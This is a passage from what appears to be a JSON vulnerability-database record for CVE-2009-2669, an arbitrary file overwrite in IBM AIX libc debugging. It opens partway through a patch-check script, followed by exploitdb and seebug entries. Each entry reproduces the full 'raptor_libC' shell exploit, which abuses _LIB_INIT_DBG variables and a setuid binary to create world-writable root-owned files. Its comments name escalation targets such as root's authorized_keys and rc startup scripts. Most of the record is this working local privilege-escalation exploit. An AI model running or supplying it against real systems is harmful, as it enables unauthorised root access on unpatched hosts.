maxfilesetver:\"6.1.2.5\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ56205_02\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.2.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ56205_2p\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.2.5\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ56205_2p\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.2.4\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T11:03:32", "bulletinFamily": "exploit", "description": "IBM AIX 5.6/6.1 _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug. CVE-2009-2669. Local exploit for aix platform", "modified": "2009-09-11T00:00:00", "published": "2009-09-11T00:00:00", "id": "EDB-ID:9645", "href": "https://www.exploit-db.com/exploits/9645/", "type": "exploitdb", "title": "IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $\r\n#\r\n# raptor_libC - AIX arbitrary file overwrite via libC debug\r\n# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>\r\n#\r\n# Property of @ Mediaservice.net Srl Data Security Division\r\n# http://www.mediaservice.net/ http://lab.mediaservice.net/\r\n#\r\n# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***\r\n#\r\n# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle \r\n# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which \r\n# allows local users to gain privileges by leveraging a setuid-root program to \r\n# create an arbitrary root-owned file with world-writable permissions, related \r\n# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1\r\n# (CVE-2009-2669).\r\n#\r\n# Typical privilege escalation techniques via arbitrary file creation don't \r\n# seem to work on recent AIX versions: .rhosts is ignored if it is group or \r\n# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; \r\n# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's\r\n# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come \r\n# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, \r\n# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.\r\n#\r\n# See also: http://milw0rm.com/exploits/9306\r\n#\r\n# Usage:\r\n# $ uname -a\r\n# AIX rs6000 3 5 0052288E4C00\r\n# $ lslpp -L xlC.rte | grep xlC.rte\r\n# xlC.rte 9.0.0.1 C F XL C/C++ Runtime \r\n# $ chmod +x raptor_libC\r\n# $ ./raptor_libC /bin/bobobobobob\r\n# [...]\r\n# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob\r\n#\r\n# Vulnerable platforms (AIX 5.3):\r\n# xlC.rte < 8.0.0.0\t\t[untested]\r\n# xlC.rte 8.0.0.0-8.0.0.14\t[untested]\r\n# xlC.rte 9.0.0.0-9.0.0.9\t[tested]\r\n# xlC.rte 10.1.0.0-10.1.0.2\t[untested]\r\n#\r\n# Vulnerable platforms (AIX 6.1):\r\n# bos.rte.libc 6.1.0.0-6.1.0.11\t[untested]\r\n# bos.rte.libc 6.1.1.0-6.1.1.6\t[untested]\r\n# bos.rte.libc 6.1.2.0-6.1.2.5\t[untested]\r\n# bos.rte.libc 6.1.3.0-6.1.3.2\t[untested]\r\n# bos.adt.prof 6.1.0.0-6.1.0.10\t[untested]\r\n# bos.adt.prof 6.1.1.0-6.1.1.5\t[untested]\r\n# bos.adt.prof 6.1.2.0-6.1.2.4\t[untested]\r\n# bos.adt.prof 6.1.3.0-6.1.3.1\t[untested]\r\n#\r\n\r\necho \"raptor_libC - AIX arbitrary file overwrite via libC debug\"\r\necho \"Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>\"\r\necho\r\n\r\n# check the arguments\r\nif [ -z \"$1\" ]; then\r\n\techo \"*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***\"\r\n\techo\r\n\techo \"Usage: $0 <filename>\"\r\n\techo\r\n\texit\r\nfi\r\n\r\n# prepare the environment\r\n_LIB_INIT_DBG=1\r\n_LIB_INIT_DBG_FILE=$1\r\nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/libC.a\r\n/usr/dt/bin/dtappgather\r\n\r\n# other good setuid targets\r\n# /usr/dt/bin/dtprintinfo\r\n# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey\r\n\r\n# check the created file\r\nls -l $_LIB_INIT_DBG_FILE\r\necho\r\n\r\n# milw0rm.com [2009-09-11]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9645/"}], "seebug": [{"lastseen": "2017-11-19T18:36:45", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-09-14T00:00:00", "published": "2009-09-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12286", "id": "SSV:12286", "title": "IBM AIX 5.6/6.1 _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug", "type": "seebug", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $\r\n#\r\n# raptor_libC - AIX arbitrary file overwrite via libC debug\r\n# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>\r\n#\r\n# Property of @ Mediaservice.net Srl Data Security Division\r\n# http://www.mediaservice.net/ http://lab.mediaservice.net/\r\n#\r\n# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***\r\n#\r\n# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle \r\n# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which \r\n# allows local users to gain privileges by leveraging a setuid-root program to \r\n# create an arbitrary root-owned file with world-writable permissions, related \r\n# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1\r\n# (CVE-2009-2669).\r\n#\r\n# Typical privilege escalation techniques via arbitrary file creation don't \r\n# seem to work on recent AIX versions: .rhosts is ignored if it is group or \r\n# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; \r\n# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's\r\n# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come \r\n# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, \r\n# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.\r\n#\r\n# See also: http://milw0rm.com/exploits/9306\r\n#\r\n# Usage:\r\n# $ uname -a\r\n# AIX rs6000 3 5 0052288E4C00\r\n# $ lslpp -L xlC.rte | grep xlC.rte\r\n# xlC.rte 9.0.0.1 C F XL C/C++ Runtime \r\n# $ chmod +x raptor_libC\r\n# $ ./raptor_libC /bin/bobobobobob\r\n# [...]\r\n# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob\r\n#\r\n# Vulnerable platforms (AIX 5.3):\r\n# xlC.rte < 8.0.0.0\t\t[untested]\r\n# xlC.rte 8.0.0.0-8.0.0.14\t[untested]\r\n# xlC.rte 9.0.0.0-9.0.0.9\t[tested]\r\n# xlC.rte 10.1.0.0-10.1.0.2\t[untested]\r\n#\r\n# Vulnerable platforms (AIX 6.1):\r\n# bos.rte.libc 6.1.0.0-6.1.0.11\t[untested]\r\n# bos.rte.libc 6.1.1.0-6.1.1.6\t[untested]\r\n# bos.rte.libc 6.1.2.0-6.1.2.5\t[untested]\r\n# bos.rte.libc 6.1.3.0-6.1.3.2\t[untested]\r\n# bos.adt.prof 6.1.0.0-6.1.0.10\t[untested]\r\n# bos.adt.prof 6.1.1.0-6.1.1.5\t[untested]\r\n# bos.adt.prof 6.1.2.0-6.1.2.4\t[untested]\r\n# bos.adt.prof 6.1.3.0-6.1.3.1\t[untested]\r\n#\r\n\r\necho "raptor_libC - AIX arbitrary file overwrite via libC debug"\r\necho "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"\r\necho\r\n\r\n# check the arguments\r\nif [ -z "$1" ]; then\r\n\techo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"\r\n\techo\r\n\techo "Usage: $0 <filename>"\r\n\techo\r\n\texit\r\nfi\r\n\r\n# prepare the environment\r\n_LIB_INIT_DBG=1\r\n_LIB_INIT_DBG_FILE=$1\r\nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/libC.a\r\n/usr/dt/bin/dtappgather\r\n\r\n# other good setuid targets\r\n# /usr/dt/bin/dtprintinfo\r\n# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey\r\n\r\n# check the created file\r\nls -l $_LIB_INIT_DBG_FILE\r\necho\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12286"}, {"lastseen": "2017-11-19T14:24:13", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66883", "id": "SSV:66883", "title": "IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug", "type": "seebug", "sourceData": "\n #!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $\r\n#\r\n# raptor_libC - AIX arbitrary file overwrite via libC debug\r\n# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>\r\n#\r\n# Property of @ Mediaservice.net Srl Data Security Division\r\n# http://www.mediaservice.net/ http://lab.mediaservice.net/\r\n#\r\n# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***\r\n#\r\n# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle \r\n# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which \r\n# allows local users to gain privileges by leveraging a setuid-root program to \r\n# create an arbitrary root-owned file with world-writable permissions, related \r\n# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1\r\n# (CVE-2009-2669).\r\n#\r\n# Typical privilege escalation techniques via arbitrary file creation don't \r\n# seem to work on recent AIX versions: .rhosts is ignored if it is group or \r\n# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; \r\n# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's\r\n# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come \r\n# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, \r\n# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.\r\n#\r\n# See also: http://milw0rm.com/exploits/9306\r\n#\r\n# Usage:\r\n# $ uname -a\r\n# AIX rs6000 3 5 0052288E4C00\r\n# $ lslpp -L xlC.rte | grep xlC.rte\r\n# xlC.rte 9.0.0.1 C F XL C/C++ Runtime \r\n# $ chmod +x raptor_libC\r\n# $ ./raptor_libC /bin/bobobobobob\r\n# [...]\r\n# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob\r\n#\r\n# Vulnerable platforms (AIX 5.3):\r\n# xlC.rte < 8.0.0.0\t\t[untested]\r\n# xlC.rte 8.0.0.0-8.0.0.14\t[untested]\r\n# xlC.rte 9.0.0.0-9.0.0.9\t[tested]\r\n# xlC.rte 10.1.0.0-10.1.0.2\t[untested]\r\n#\r\n# Vulnerable platforms (AIX 6.1):\r\n# bos.rte.libc 6.1.0.0-6.1.0.11\t[untested]\r\n# bos.rte.libc 6.1.1.0-6.1.1.6\t[untested]\r\n# bos.rte.libc 6.1.2.0-6.1.2.5\t[untested]\r\n# bos.rte.libc 6.1.3.0-6.1.3.2\t[untested]\r\n# bos.adt.prof 6.1.0.0-6.1.0.10\t[untested]\r\n# bos.adt.prof 6.1.1.0-6.1.1.5\t[untested]\r\n# bos.adt.prof 6.1.2.0-6.1.2.4\t[untested]\r\n# bos.adt.prof 6.1.3.0-6.1.3.1\t[untested]\r\n#\r\n\r\necho "raptor_libC - AIX arbitrary file overwrite via libC debug"\r\necho "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"\r\necho\r\n\r\n# check the arguments\r\nif [ -z "$1" ]; then\r\n\techo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"\r\n\techo\r\n\techo "Usage: $0 <filename>"\r\n\techo\r\n\texit\r\nfi\r\n\r\n# prepare the environment\r\n_LIB_INIT_DBG=1\r\n_LIB_INIT_DBG_FILE=$1\r\nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/libC.a\r\n/usr/dt/bin/dtappgather\r\n\r\n# other good setuid targets\r\n# /usr/dt/bin/dtprintinfo\r\n# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey\r\n\r\n# check the created file\r\nls -l $_LIB_INIT_DBG_FILE\r\necho\r\n\r\n# milw0rm.com [2009-09-11]\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66883"}]}